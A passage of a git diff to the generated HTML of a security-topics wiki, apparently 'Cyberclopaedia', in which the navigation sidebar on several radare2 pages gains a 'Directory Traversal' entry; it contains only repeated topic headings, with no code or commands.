        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -210,22 +210,6 @@

Flag Spaces

- - diff --git a/docs/Reverse Engineering/Reverse Engineering with radare2/Seeking.html b/docs/Reverse Engineering/Reverse Engineering with radare2/Seeking.html index c7101e50..a864c93d 100644 --- a/docs/Reverse Engineering/Reverse Engineering with radare2/Seeking.html +++ b/docs/Reverse Engineering/Reverse Engineering with radare2/Seeking.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -216,22 +216,6 @@

Seeking

- - diff --git a/docs/Reverse Engineering/Reverse Engineering with radare2/Strings.html b/docs/Reverse Engineering/Reverse Engineering with radare2/Strings.html index 40700b55..1dec34a1 100644 --- a/docs/Reverse Engineering/Reverse Engineering with radare2/Strings.html +++ b/docs/Reverse Engineering/Reverse Engineering with radare2/Strings.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -183,22 +183,6 @@

Strings

- - diff --git a/docs/Reverse Engineering/Reverse Engineering with radare2/index.html b/docs/Reverse Engineering/Reverse Engineering with radare2/index.html index 404c175e..ce667e3b 100644 --- a/docs/Reverse Engineering/Reverse Engineering with radare2/index.html +++ b/docs/Reverse Engineering/Reverse Engineering with radare2/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
